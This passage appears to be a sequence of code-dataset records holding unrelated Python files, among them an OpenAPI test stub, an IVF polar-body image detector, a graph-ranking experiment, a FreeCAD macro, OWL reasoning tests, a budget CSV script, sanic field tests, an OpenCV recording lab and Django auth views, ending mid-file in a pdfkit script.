API description for Moira Alert project. Please check https://github.com/moira-alert # noqa: E501\n\n The version of the OpenAPI document: 2.5.1.47\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\nimport datetime\n\nimport openapi_client\nfrom openapi_client.models.event import Event # noqa: E501\nfrom openapi_client.rest import ApiException\n\nclass TestEvent(unittest.TestCase):\n \"\"\"Event unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def make_instance(self, include_optional):\n \"\"\"Test Event\n include_option is a boolean, when False only required\n params are included, when True both required and\n optional params are included \"\"\"\n # model = openapi_client.models.event.Event() # noqa: E501\n if include_optional :\n return Event(\n trigger_event = True, \n timestamp = 1590741878, \n metric = 'carbon.agents.*.metricsReceived', \n value = 70, \n state = 'OK', \n trigger_id = '5ff37996-8927-4cab-8987-970e80d8e0a8', \n sub_id = '0', \n contact_id = '0', \n old_state = 'ERROR', \n msg = '0', \n event_message = openapi_client.models.event_event_message.Event_event_message(\n maintenance = openapi_client.models.event_event_message_maintenance.Event_event_message_maintenance(\n setup_user = '0', \n setup_time = 56, \n remove_user = '0', \n remove_time = 56, ), \n interval = 56, )\n )\n else :\n return Event(\n )\n\n def testEvent(self):\n \"\"\"Test Event\"\"\"\n inst_req_only = self.make_instance(include_optional=False)\n inst_req_and_optional = self.make_instance(include_optional=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"idoqo/moira-clients","sub_path":"python/test/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7091074846","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom skimage import feature, transform, io, draw\nfrom sklearn.cluster 
import DBSCAN\nimport os\n\ndef load_images(path, color):\n os.chdir(path)\n filenames = [f for f in os.listdir('.') if os.path.isfile(f)]\n images = []\n for file in filenames:\n images.append(io.imread(file, not color))\n return images\n\n# TODO: Add docstring\nclass PolarBodyDetector:\n \"\"\"\n A class that can detect the presence of a polar body\n \n Args:\n \n Returns:\n \n \"\"\"\n def __init__(self, pipTemplate, startImg, cSigma=2, cLow=0.1, cHigh=0.6, minR=60,\n eSigma=2, eThres=0.1, dbEps=20, dbSamples=150):\n self.pipTemplate = pipTemplate # Template of the pipette tip\n self.startImg = startImg # First image before detection\n self.cSigma = cSigma # sigma of gaussian filter for canny edge detection\n self.cLow = cLow # low threshold for canny\n self.cHigh = cHigh # high threshold for canny\n self.minR = minR # minimum radius of oolemma\n self.eSigma = eSigma # sigma of gaussian filter for edge detection\n self.eThres = eThres # threshold for edge detection\n self.dbEps = dbEps # distance of samples for clustering\n self.dbSamples = dbSamples # minimum number of samples in a cluster\n self._detect_oocyte_roi(startImg)\n self._detect_oolemma_roi(startImg)\n \n def _detect_oocyte_roi(self, img):\n res = feature.match_template(img, self.pipTemplate)\n ij = np.unravel_index(np.argmax(res), res.shape)\n self.coordROI = (ij[0]-45, ij[1]-200, 250, 200)\n roi = img[ij[0]-45:ij[0]+205,ij[1]-200:ij[1]]\n return roi\n \n def _detect_oolemma_roi(self, img):\n y, x , h, w = self.coordROI\n roi = img[y:y+h, x:x+w]\n # find canny edges to detect oolemma\n roiC = feature.canny(roi, sigma=self.cSigma,\n low_threshold=roi.mean()*self.cLow, \n high_threshold=roi.mean()*self.cHigh)\n \n # Create a bounding box and find center of box\n lr = roiC.mean(axis=0)\n ud = roiC.mean(axis=1)\n l, r = np.nonzero(lr)[0][0], np.nonzero(lr)[0][-1]\n u, d = np.nonzero(ud)[0][0], np.nonzero(ud)[0][-1]\n cy, cx = int((u+d)/2.0), int((r+l)/2.0)\n \n dist = np.asarray([(r-l)/2.0, (d-u)/2.0])\n \n self.minDist = dist.min()\n self.maxDist = dist.max()\n aveDist = (self.maxDist+self.minDist)/2\n self.coordOO = (cy, cx, aveDist)\n \n def _create_patch(self, img):\n cy, cx, aveDist = self.coordOO\n y, x , h, w = self.coordROI\n roi = img[y:y+h, x:x+w]\n \n minDist = int(aveDist-10)\n maxDist = int(aveDist+30)\n \n # Extract a patch by \n imPad = np.zeros((400,400), dtype=np.float64)\n imPad[200-cy:450-cy, 200-cx:400-cx] = roi\n imRot = transform.rotate(imPad, angle=30, center=[200,200])\n patch = np.expand_dims(imRot[200-maxDist:200-minDist, 200],axis=1)\n for i in range(29,-210,-1):\n imRot = transform.rotate(imPad, angle=i, center=[200,200])\n vert = np.expand_dims(imRot[200-maxDist:200-minDist, 200],axis=1)\n patch = np.hstack([patch, vert])\n return patch, (cy,cx)\n \n \n def _detect_polar_body_patch(self, patch):\n # Find edges in patch\n patchKT = feature.corner_shi_tomasi(patch, sigma=self.eSigma)\n patchKT = (patchKT-patchKT.min())/(patchKT.max()-patchKT.min())\n patchTH = patchKT.copy()\n # threshold edges\n th = self.eThres\n patchTH[patchKT<=th] = 0\n patchTH[patchKT>th] = 255\n patchTH[:,0:6] = 0\n patchTH[:,235:] = 0\n \n # extract coordinates of keypoints\n keyps = np.where(patchTH==255)\n keyps = np.asarray([[y, x] for (y,x) in zip(keyps[0], keyps[1])])\n \n # if any keypoints are found, find clusters\n if keyps.size > 0:\n \n db = DBSCAN(eps=self.dbEps, min_samples=self.dbSamples).fit(keyps)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n 
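The detector above leans on DBSCAN's labelling convention: -1 marks noise, and cluster 0's bounding-box midpoint becomes the candidate polar-body position. A self-contained sketch of that labelling and midpoint step on synthetic keypoints (all values illustrative):

# Standalone sketch of the DBSCAN step used above.
import numpy as np
from sklearn.cluster import DBSCAN

rng = np.random.default_rng(0)
cluster = rng.normal(loc=(50, 80), scale=2.0, size=(200, 2))
noise = rng.uniform(0, 200, size=(10, 2))
keyps = np.vstack([cluster, noise])

labels = DBSCAN(eps=5, min_samples=20).fit(keyps).labels_
if (labels == 0).any():
    xy = keyps[labels == 0]
    ym = int((xy[:, 0].max() + xy[:, 0].min()) / 2)
    xm = int((xy[:, 1].max() + xy[:, 1].min()) / 2)
    print("cluster centre:", (ym, xm))  # geometric midpoint, as above
else:
    print("only noise (label -1); no detection")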
labels = db.labels_\n \n if np.asarray((labels==-1)).all():\n pb = False\n coord = (-1,-1)\n elif np.asarray((labels==0)).any():\n # find the geometric center of the cluster\n class_member_mask = (labels==0)\n xy = keyps[class_member_mask]\n ym = int((xy[:,0].max()+xy[:,0].min())/2)\n xm = int((xy[:,1].max()+xy[:,1].min())/2)\n pb = True\n coord = (ym,xm)\n return pb, coord\n \n def detect_and_extract_patch(self, img):\n patch, center = self._create_patch(img)\n pb, pbPos = self._detect_polar_body_patch(patch)\n return pb, pbPos, patch\n \n def detect_and_extract(self,img, visualize=False):\n cy, cx, aveDist = self.coordOO\n y, x , h, w = self.coordROI\n roi = img[y:y+h, x:x+w]\n\n alpha = np.linspace(0,18,num=10)*5/180*np.pi\n circy = (np.cos(alpha)*(aveDist+5)).astype(np.uint8)\n circx = (np.sin(alpha)*(aveDist+5)).astype(np.uint8)\n \n coord = np.vstack([ np.hstack([cy-np.flipud(circy[0:5]), cy-circy[1:],\n cy-np.flipud(circy[0:-1]*(-1)), cy-circy[1:5]*(-1)]),\n np.hstack([np.flipud(circx[0:5])+cx, circx[1:]*(-1)+cx,\n np.flipud(circx[0:-1]*(-1))+cx, circx[1:5]+cx])])\n coord[coord<20] = 20\n pbpos = np.zeros([2,1], dtype=np.uint64)\n mask = np.zeros((40,40), dtype=bool)\n mask[0:6,0:6] = True\n mask[-5:,0:6] = True\n mask[0:6,-5:] = True\n mask[-5:, -5:] = True\n \n if visualize:\n roiTemp = roi.copy()\n for y,x in zip(coord[0,:], coord[1,:]):\n for i in range(-1,2):\n roiTemp[draw.polygon_perimeter([y-20+i, y-20+i, y+20-i, y+20-i, y-20-i],\n [x-20+i, x+20-i, x+20-i, x-20+i, x-20+i],\n shape=roiTemp.shape)] = 1\n \n for i in range(0,coord.shape[1]):\n patch = roi[coord[0,i]-20:coord[0,i]+20, coord[1,i]-20:coord[1,i]+20].copy()\n patchKT = feature.corner_shi_tomasi(patch, sigma=2)\n patchKT = (patchKT-patchKT.min())/(patchKT.max()-patchKT.min())\n patchTH = patchKT.copy()\n th = 0.1\n patchTH[patchKT<=th] = 0\n patchTH[patchKT>th] = 1\n patchTH[mask] = 0\n \n keyps = np.where(patchTH==1)\n keyps = np.asarray([[y, x] for (y,x) in zip(keyps[0], keyps[1])])\n \n if keyps.size > 0:\n \n db = DBSCAN(eps=self.dbEps, min_samples=self.dbSamples).fit(keyps)\n labels = db.labels_\n if np.asarray((labels==0)).any():\n class_member_mask = (labels==0)\n xy = keyps[class_member_mask]\n pbpos = np.hstack([pbpos,(np.vstack([coord[0,i]+xy[:,0]-20,coord[1,i]+xy[:,1]-20]))])\n \n pbpos = np.transpose(pbpos).astype(np.uint64)\n pbCoord = pd.DataFrame(data=pbpos, columns={'y','x'})\n pbCoord.drop_duplicates(['x','y'], inplace=True)\n \n db = DBSCAN(eps=25, min_samples=700).fit(pbCoord.values)\n labels = db.labels_\n \n if np.asarray((labels==-1)).all():\n pb = False\n pbPos = (-1,-1)\n if visualize:\n roiPB = roi.copy()\n elif np.asarray((labels==0)).any():\n # find the geometric center of the cluster\n pb = True\n class_member_mask = (labels==0)\n xy = pbCoord.values[class_member_mask]\n pby = int((xy[:,0].max()+xy[:,0].min())/2)\n pbx = int((xy[:,1].max()+xy[:,1].min())/2)\n pbPos = (pby, pbx)\n if visualize:\n roiPB = roi.copy()\n roiPB[xy[:,0], xy[:,1]] = 1\n\n inPosition = False\n \n if visualize:\n return pb, pbPos, inPosition, roiTemp, roiPB, pbCoord\n else:\n return pb, pbPos, inPosition","repo_name":"DanielHMeyer/IVF_PolarBodyDetection","sub_path":"polarbodydetection.py","file_name":"polarbodydetection.py","file_ext":"py","file_size_in_byte":8633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5862783255","text":"\"\"\"\n@author: JUMP\n@date 2021/12/13\n@description: 加载模型进行预测,使用排序算法对节点进行排序并保存排序结果\n\"\"\"\nimport json\n\nimport 
tensorflow as tf\nfrom experiment.exp_utils import *\nfrom gcn.models import GCN\nimport networkx as nx\nfrom experiment.pagerank import PageRank\nfrom experiment.leaderrank import LeaderRank\nfrom experiment.hits import HITS\nfrom experiment.myrank import MyRank\nfrom experiment.User import User\nfrom experiment.weightedpagerank import WeightedPagerank\nimport time\n\n\nclass NpEncoder(json.JSONEncoder):\n    \"\"\"\n    用户将ndarray保存至json时的数据类型转换\n    \"\"\"\n    def default(self, obj):\n        if isinstance(obj, np.integer):\n            return int(obj)\n        elif isinstance(obj, np.floating):\n            return float(obj)\n        elif isinstance(obj, np.ndarray):\n            return obj.tolist()\n        else:\n            return super(NpEncoder, self).default(obj)\n\n\nif __name__ == \"__main__\":\n\n    dataset = \"cora\"\n    type_num = 7\n\n    # dataset = \"citeseer\"\n    # type_num = 6\n\n    # dataset = \"pubmed\"\n    # type_num = 3\n\n\n\n    flags = tf.app.flags\n    # 'cora', 'citeseer', 'pubmed'\n    flags.DEFINE_string('dataset', dataset, 'Dataset string.')\n    # 'gcn', 'gcn_cheby', 'dense'\n    flags.DEFINE_string('model', 'gcn', 'Model string.')\n    flags.DEFINE_float('learning_rate', 0.01, 'Initial learning rate.')\n    flags.DEFINE_integer('epochs', 200, 'Number of epochs to train.')\n    flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.')\n    flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).')\n    flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.')\n    flags.DEFINE_integer('early_stopping', 10, 'Tolerance for early stopping (# of epochs).')\n    flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.')\n\n    adj, features, y_test, test_mask = load_data(dataset)\n\n    # 未处理过的原始特征矩阵,已转换为ndarray\n    raw_features = features.A\n    # 未处理过的原始邻接矩阵,已转换为DiGraph\n    raw_adj = nx.DiGraph(adj)\n\n\n    # Some preprocessing\n    features = preprocess_features(features)\n    support = [preprocess_adj(adj)]\n\n    # Define placeholders\n    placeholders = {\n        'support': [tf.sparse_placeholder(tf.float32) for _ in range(1)],\n        'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)),\n        'labels': tf.placeholder(tf.float32, shape=(None, y_test.shape[1])),\n        'labels_mask': tf.placeholder(tf.int32),\n        'dropout': tf.placeholder_with_default(0., shape=()),\n        'num_features_nonzero': tf.placeholder(tf.int32)  # helper variable for sparse dropout\n    }\n\n    # Create model\n    model = GCN(placeholders, input_dim=features[2][1], logging=True, name=dataset)\n\n    # Initialize session\n    sess = tf.Session()\n    # Init variables\n    sess.run(tf.global_variables_initializer())\n\n    # 加载模型\n    print(\"Loading model start...\")\n    saverdir = \"../model/\" + dataset\n    saver = tf.train.Saver()\n    saver.restore(sess, tf.train.latest_checkpoint(saverdir))\n    print(\"Loading model finish...\")\n\n    # 节点类型预测\n    print(\"Model predict start...\")\n    feed_dict_validate = construct_feed_dict(features, support, y_test, test_mask, placeholders)\n    predictions = sess.run(model.predict(), feed_dict=feed_dict_validate)\n    print(\"Model predict finish...\")\n\n    # 将预测结果转换成标签0 ~ n\n    predict_labels = transfer_res_to_label(predictions)\n    # 获取各类的代表向量\n    repre_vectors = get_representation_vector(raw_features, predict_labels,type_num)\n    # 获取代表向量间的相似度矩阵\n    cos_sim_mat = get_cos_sim_matrix(repre_vectors, type_num)\n\n\n\n    \"\"\"\n    PageRank算法\n    cora:209轮达到稳态\n    citeseer:220轮左右\n    pubmed:204轮\n    \"\"\"\n\n    # total = 0\n    # for _ in range(5):\n    #     pr_start = time.time()\n    #     pageRank = PageRank(adj.shape[0])\n    #     for i in range(20):\n    #         pageRank.rank(raw_adj, 10)\n    #     pr_list = 
pageRank.get_rank(predict_labels)\n # pr_end = time.time()\n # total += pr_end - pr_start\n # print(\"pagerank avg time:\", total / 5)\n\n\n # pr_record = pageRank.get_epoch_record()\n # pr_path = \"./\" + dataset + \"_rank/pr_rank.json\"\n # with open(pr_path, \"w\") as f:\n # json.dump(pr_list, f, cls=NpEncoder)\n # pr_end = time.time()\n # print(\"pagerank total time:\", pr_end - pr_start)\n\n\n #\n\n \"\"\"\n 本算法\n single:\n cora: 218轮\n last_week = [4]\n \n citeseer:206轮\n last_week = [4]\n \n pubmed:217轮\n last_week = [0]\n \n \n multi:\n cora: 4、5、6 三类 235轮\n last_week = [4, 5, 6]\n last_month = [6,6,6,5,5]\n last_three_months = [4,4]\n \n \n citeseer:3、4、5 三类 230轮\n last_week = [3, 4, 5]\n last_month = [5,5,5,4,4]\n last_three_months = [3,3]\n \n pubmed:0、1 两类 233轮\n last_week = [0,1,0]\n last_month = []\n last_three_months = []\n \n \n personalized recommendation:\n cora: 234轮 personal_1.json\n last_week = [4, 6]\n last_month = [6,6,6,4,4]\n last_three_months = [6,6]\n \n 233轮 personal_2.json\n last_week = [4, 4]\n last_month = [4, 4, 4, 4, 6]\n last_three_months = [4, 4]\n \n \"\"\"\n last_week = [0]\n last_month = []\n last_three_months = []\n\n # myrank_total_time = 0\n # for _ in range(5):\n # myrank_start = time.time()\n # user = User(last_week, last_month, last_three_months)\n # myrank = MyRank(user, raw_adj, cos_sim_mat, predict_labels, type_num, adj.shape[0])\n # for i in range(20):\n # myrank.rank(raw_adj, 10, predict_labels)\n # myrank_list = myrank.get_rank(predict_labels)\n # myrank_end = time.time()\n # myrank_total_time += (myrank_end - myrank_start)\n # print(\"MyRank average runtime:\", myrank_total_time / 5)\n\n # myrank_record = myrank.get_epoch_record()\n # myrank_path = \"./\" + dataset + \"_rank/personal_2.json\"\n # with open(myrank_path, \"w\") as f:\n # json.dump(myrank_list, f, cls=NpEncoder)\n\n\n\n\n \"\"\"\n HITS算法\n cora:100轮\n citeseer:100轮\n pubmed:100轮\n \"\"\"\n\n # total = 0\n # for _ in range(2):\n # hits_start = time.time()\n # hits = HITS(raw_adj, adj.shape[0])\n # for i in range(20):\n # hits.rank(raw_adj, 10)\n # hist_list = hits.get_rank(predict_labels)\n # hits_end = time.time()\n # total += hits_end - hits_start\n # print(\"hits runtime:\", total / 2)\n\n # hits_record = hits.get_epoch_record()\n # hits_path = \"./\" + dataset + \"_rank/hits_rank.json\"\n # with open(hits_path, \"w\") as f:\n # json.dump(hist_list, f, cls=NpEncoder)\n\n\n \"\"\"\n LeaderRank算法\n cora:167轮\n citeseer:180轮\n pubmed:268轮\n \"\"\"\n\n # total = 0\n # for _ in range(5):\n # lr_start = time.time()\n # leader_rank = LeaderRank()\n # leader_rank.rank(raw_adj, 200)\n # lr_list = leader_rank.get_rank(predict_labels)\n # lr_end = time.time()\n # total += lr_end - lr_start\n # print(\"lr runtime:\", total / 5)\n\n # lr_record = leader_rank.get_epoch_record()\n # lr_path = \"./\" + dataset + \"_rank/lr_rank.json\"\n # with open(lr_path, \"w\") as f:\n # json.dump(lr_list, f, cls=NpEncoder)\n\n\n \"\"\"\n Weighted PageRank\n cora:100轮\n citeseer:100轮\n pubmed:50轮\n \"\"\"\n total = 0\n for _ in range(5):\n wpr_start = time.time()\n wpr = WeightedPagerank(raw_adj, adj.shape[0])\n for i in range(10):\n wpr.rank(raw_adj, 10)\n wpr_list = wpr.get_rank(predict_labels)\n wpr_end = time.time()\n total += wpr_end - wpr_start\n print(\"wpr runtime:\", total / 5)\n\n\n # wpr_records = wpr.get_epoch_record()\n # wpr_path = \"./\" + dataset + \"_rank/wpr_rank.json\"\n # with open(wpr_path, \"w\") as f:\n # json.dump(wpr_list, f, cls=NpEncoder)\n\n i = 
1\n\n\n","repo_name":"MMNMNMN/HisRank","sub_path":"experiment/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70430276267","text":"import FreeCADGui as Gui, FreeCAD, Part, math\n\nprintfc = FreeCAD.Console.PrintMessage\n\nfaces = []\n\nfor sel in Gui.Selection.getSelectionEx():\n if len(sel.Object.Shape.Faces):\n faces.extend(sel.Object.Shape.Faces)\n else:\n faces.extend(sel.SubObjects)\n \n\nshell=Part.makeShell(faces)\nsolid=Part.makeSolid(shell)\nPart.show(solid)\n\n\n","repo_name":"andrewjrobinson/FreeCAD-Macro-Suite","sub_path":"src/nonparametric/MakeSolid.py","file_name":"MakeSolid.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26811096477","text":"\"\"\"\nTest for OWL 2 RL/RDF rules from\n\n Table 4. The Semantics of Equality\n\nhttps://www.w3.org/TR/owl2-profiles/#Reasoning_in_OWL_2_RL_and_RDF_Graphs_using_Rules\n\"\"\"\n\nfrom rdflib import Graph, BNode, Literal, Namespace, RDF, XSD, RDFS, OWL\n\nimport owlrl\n\nDAML = Namespace('http://www.daml.org/2002/03/agents/agent-ont#')\nT = Namespace('http://test.org/')\n\ndef test_eq_diff1():\n \"\"\"\n Test eq-diff1 rule for OWL 2 RL.\n\n If::\n\n T(?x, owl:sameAs, ?y)\n T(?x, owl:differentFrom, ?y)\n\n then::\n\n false\n \"\"\"\n g = Graph()\n\n x = T.x\n y = T.y\n\n g.add((x, OWL.sameAs, y))\n g.add((x, OWL.differentFrom, y))\n\n owlrl.DeductiveClosure(owlrl.OWLRL_Semantics).expand(g)\n\n result = g.objects(predicate=DAML.error)\n expected = Literal(\n '\\'sameAs\\' and \\'differentFrom\\' cannot be used on the same' \\\n + ' subject-object pair:'\n )\n \n # expect multiple error messages for pairs (x, y), (x, x) and (y, y)\n # due to contradiction:\n #\n # x == y and x != y => x != x and y != y and x == x and y == y\n assert all(r.startswith(expected) for r in result)\n\n","repo_name":"BastyZ/RDFPlayground","sub_path":"mimir/src/main/reasoner/owlrl/test/test_equality.py","file_name":"test_equality.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"28231120482","text":"import os\nimport csv\nprint(\"Financial Analysis\")\nprint(\"-----------------------------\")\nbudget_data_path = os.path.join('Resources', 'budget_data.csv')\n\nwith open(budget_data_path, \"r\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter = \",\")\n header = next(csvreader)\n data = list(csvreader)\n date, profit_loss = zip(*data)\n #print('date =', date)\n #print('profit and loss =', profit_loss)\n xtol = [int(x) for x in profit_loss if x]\n #print(xval)\n total_date = len(date)\n print(\"Total Month: \" + str(total_date))\n total_profit_loss = sum(xtol)\n print(\"Total Profit and Loss: \" + str(total_profit_loss))\n revenue_change = []\n for i in range(1, len(xtol)):\n revenue_change.append((int(xtol[i]) - int(xtol[i-1])))\n # calculate average revenue change\n revenue_average = sum(revenue_change) / len(revenue_change)\n print(\"Average change is: \" + str(revenue_average))\n maxtotal = max(xtol)\n print(\"The greatest increase is: \" + str(date[revenue_change.index(max(revenue_change))+1]) + \" \" + str(maxtotal))\n mintotal = min(xtol)\n print(\"The greatest decrease is: \" + str(date[revenue_change.index(min(revenue_change))+1]) + \" \" + str(mintotal))\n\n \n file = open(\"output.txt\",\"w\")\n 
file.write(\"Financial Analysis\" + \"\\n\")\n file.write(\"....................................................................................\" + \"\\n\")\n file.write(\"Total Month: \" + str(total_date) + \"\\n\")\n file.write(\"Total Profit and Loss: \" + str(total_profit_loss) + \"\\n\")\n file.write(\"Average change is: \" + str(revenue_average) + \"\\n\")\n file.write(\"The greatest increase is: \" + str(date[revenue_change.index(max(revenue_change))+1]) + \" \" + str(maxtotal) + \"\\n\")\n file.write(\"The greatest decrease is: \" + str(date[revenue_change.index(min(revenue_change))+1]) + \" \" + str(mintotal) + \"\\n\")\n file.close()\n \n ","repo_name":"sdee10/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10054685579","text":"\"\"\"\n@Author:WangYuXiang\n@E-mile:Hill@3io.cc\n@CreateTime:2021/1/28 16:16\n@DependencyLibrary:无\n@MainFunction:无\n@FileDoc: \n test_char_field.py\n 字符字段单元测试\n@ChangeHistory:\n datetime action why\n example:\n 2021/1/28 16:16 change 'Fix bug'\n \n\"\"\"\nimport asyncio\nimport unittest\n\nfrom tortoise.contrib.test import initializer\n\nfrom sanic_rest_framework.exceptions import ValidationError\nfrom sanic_rest_framework.fields import CharField\nfrom sanic_rest_framework.test.test_fields.test_base_field import TestBaseField\n\ninitializer(['sanic_rest_framework.test.models', ],\n # db_url=\"sqlite://./db.sqlite\",\n loop=asyncio.get_event_loop())\n\n\nclass TestCharField(TestBaseField):\n def test_external_to_internal(self):\n data = ' Python'\n char1 = CharField()\n self.assertEqual(char1.external_to_internal(data), 'Python')\n\n async def test_internal_to_external(self):\n data1 = {'char1': 'Python'}\n data2 = {'char1': 66666}\n char1 = CharField()\n char1.bind('char1', char1)\n\n value = await char1.get_internal_value(data1)\n self.assertEqual(await char1.internal_to_external(value), 'Python')\n\n value = await char1.get_internal_value(data2)\n self.assertEqual(await char1.internal_to_external(value), '66666')\n\n def test_trim_whitespace(self):\n data = ' Python'\n char1 = CharField()\n char2 = CharField(trim_whitespace=True)\n char3 = CharField(trim_whitespace=False)\n c1_data = char1.external_to_internal(data)\n c2_data = char2.external_to_internal(data)\n c3_data = char3.external_to_internal(data)\n self.assertEqual(c1_data, 'Python')\n self.assertEqual(c2_data, 'Python')\n self.assertEqual(c3_data, ' Python')\n\n def test_max_length(self):\n data = 'Python'\n char1 = CharField()\n char2 = CharField(max_length=10)\n char3 = CharField(max_length=5)\n self.assertEqual(char1.run_validation(data), 'Python')\n self.assertEqual(char2.run_validation(data), 'Python')\n\n with self.assertRaises(ValidationError):\n char3.run_validation(data)\n\n def test_min_length(self):\n data = 'Python'\n char1 = CharField()\n char2 = CharField(min_length=5)\n char3 = CharField(min_length=10)\n self.assertEqual(char1.run_validation(data), 'Python')\n self.assertEqual(char2.run_validation(data), 'Python')\n\n with self.assertRaises(ValidationError):\n char3.run_validation(data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"OpenHill/sanic_rest_framework","sub_path":"test/test_fields/test_char_field.py","file_name":"test_char_field.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"10327360046","text":"import cv2\n\ndef capture_image_sequence(): \n cv2.namedWindow(\"camera\")\n camera = cv2.VideoCapture(0)\n \n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640,480))\n \n recording = False\n counter = 0\n while camera.isOpened():\n ret,img= camera.read() \n \n if recording:\n out.write(img)\n cv2.putText(img,'recording', (10,60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n \n cv2.putText(img,str(counter), (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.imshow(\"camera\", img) \n \n counter += 1\n \n k = cv2.waitKey(1)\n if k%256 == 32:\n if not recording:\n counter = 0\n print(\"Space hit, recording...\")\n recording = True\n else:\n print(\"Space hit, stop recording and closing...\")\n break\n elif k%256 == 27:\n print(\"Escape hit, closing...\")\n break \n \n out.release()\n camera.release()\n cv2.destroyWindow(\"camera\") \n\ndef extract_frames(numbers):\n video = cv2.VideoCapture(\"output.avi\")\n counter = 0\n while video.isOpened():\n ret,img= video.read()\n if not ret:\n break\n if counter in numbers:\n cv2.imwrite(\"frame_%s.jpg\"%counter, img)\n counter+=1\n video.release()\n cv2.destroyWindow(\"video\")\n \ndef load_and_display(number):\n img = cv2.imread(\"frame_%s.jpg\"%number)\n cv2.imshow(\"image\", img)\n cv2.waitKey(0)\n cv2.destroyWindow(\"image\")\n \n\ndef main():\n capture_image_sequence()\n \n extract_frames([25,50,100])\n \n load_and_display(50)\n \nmain()","repo_name":"sriranjani-s/Artificial-Intelligence-Learnings-and-Projects","sub_path":"Machine Vision/Labs/Lab_MV_01.py","file_name":"Lab_MV_01.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17865813359","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth import login\nfrom django.contrib.auth.views import LoginView\nfrom django.contrib.auth.views import LogoutView\nfrom django.http import HttpRequest\nfrom django.shortcuts import redirect\nfrom django.views.generic import TemplateView\n\nfrom .forms import RegForm\nfrom .forms import UserLoginForm\nfrom .models import Profile\n\n\nclass LoginAuthView(LoginView):\n template_name = 'page_login/index.html'\n authentication_form = UserLoginForm\n \n main_header = 'Авторизация'\n page_header = f'{main_header} | Django | Skillbox'\n page_title = f'{main_header}'\n \n def get_context_data(self, *, object_list=None, **kwargs):\n context = super().get_context_data(**kwargs)\n context['page_header'] = self.page_header\n context['page_title'] = self.page_title\n \n # return self.render_to_response(context=context)\n return context\n\n\nclass LogoutAuthView(LogoutView):\n # next_page = '/auth/login'\n template_name = 'auth_template/logout.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n \n logout_page_data = self.request.META['HTTP_REFERER']\n host_data: str = self.request.META['HTTP_HOST']\n # print(host_data)\n # print(logout_page_data)\n \n logout_page_arr: list = logout_page_data.split(host_data + '/')\n # print(f'{logout_page_arr=}')\n \n if len(logout_page_arr) >= 2:\n logout_page = logout_page_arr[1]\n else:\n logout_page = '/'\n # print(f'{logout_page=}')\n context['logout_page'] = logout_page\n # print(self.request.META)\n \n return context\n\n\nclass RegView(TemplateView):\n template_name = 'page_reg/index.html'\n \n main_header = 'Регистрация'\n page_header = f'{main_header} | Django | 
Skillbox'\n page_title = f'{main_header}'\n \n def get_context_data(self, **kwargs):\n \"\"\"\n GET\n :param kwargs:\n :return:\n \"\"\"\n \n context = super().get_context_data(**kwargs)\n context['page_header'] = self.page_header\n context['page_title'] = self.page_title\n \n user_reg_form = RegForm()\n \n context['form'] = user_reg_form\n \n return context\n \n def post(self, request: HttpRequest, *args, **kwargs):\n context = super().get_context_data(**kwargs)\n \n context['page_header'] = self.page_header\n context['page_title'] = self.page_title\n \n form = RegForm(request.POST)\n \n if form.is_valid():\n user = form.save()\n username = form.cleaned_data.get('username')\n password = form.cleaned_data.get('password1')\n birthday = form.cleaned_data.get('birthday')\n city = form.cleaned_data.get('city')\n \n Profile.objects.create(\n user=user,\n city=city,\n birthday=birthday\n )\n \n user = authenticate(username=username, password=password)\n login(request, user)\n return redirect('/')\n \n context['form'] = form\n \n return self.render_to_response(context=context)\n","repo_name":"VolodinAS/skillbox-python-django-practice","sub_path":"01_IntroductionToWebFrameworks/todo/app_users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33575279015","text":"import pdfkit\nfrom movies import Movies\n\n\nPDF_DIRECTORY = \"/var/tmp/\"\n\n\ndef safe_title(title):\n return title.replace(' ', '-')\n\n\ndef create_pdf_for_download(id):\n movie_data = Movies.selected_movie(id)\n movie_data = movie_data[0]\n\n language = movie_data['language']\n release_date = movie_data['release_date']\n title = movie_data['title']\n overview = movie_data['overview']\n original_language = movie_data['original_language']\n status = movie_data['status']\n runtime = movie_data['runtime']\n vote_average = movie_data['vote_average']\n genres = movie_data['genres']\n\n # 